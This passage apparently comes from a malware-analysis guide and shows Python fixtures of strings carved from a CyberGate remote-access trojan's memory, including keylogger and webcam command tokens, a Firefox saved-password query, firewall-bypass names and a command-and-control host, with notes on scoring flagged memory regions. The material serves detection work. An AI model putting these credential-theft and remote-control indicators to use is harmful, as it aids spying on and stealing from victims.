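    b"Z:\\Projects\\CyberGate Excel\\Workplace\\beta 2.5.2.0\\Server\\Indy10\\System\\IdStack.pas",
    b"EIdTCPConnectionError", b"Socket Error # %d", b"Connecting to %s.",
    b"keylogger|keyloggerativar|T|", b"keylogger|keyloggerativar|F|",
    b"keylogger|keyloggerbaixar|NOLOGS", b"listarportas|finalizarprocessoportas|Y|",
    b"listarportas|finalizarprocessoportas|N|", b"filemanager|fmsendftp|",
    b"webcam|webcamstream|", b"chromepass|",
    b"signons.sqlite", b"SELECT * FROM moz_logins",
    b"HNetCfg.FwAuthorizedApplication", b"StaticPortMappingCollection",
    b"CYBERGATEPASS", b"lala25.no-ip.biz", b"C:\\User", b"InstallDir.exe",
    b"%DEFAULTBROWSER%", b"2.5.2.0",
]) + b"\x00"

# Region carrying only the Indy/Delphi library strings: must not alert.
BENIGN_INDY_REGION = b"\x00".join([
    b"EIdTCPConnectionError", b"Socket Error # %d", b"Connecting to %s.",
    b"TIdTCPClient", b"Invalid Port Range (%d - %d)",
]) + b"\x00"

if __name__ == "__main__":
    print(score_region(SAMPLE_REGION))
    print(group_commands(SAMPLE_REGION))
    print(strings_after(SAMPLE_REGION, b"CYBERGATEPASS", 5))
```

On a real case, feed `score_region` the bytes of each RWX region the sandbox flagged (here `iexplore.exe_3128_rwx_01611000_0010D000`); the verb tree from `group_commands` gives the tokens to anchor a network signature on, and `strings_after` gives the C2 host and install name to pivot on.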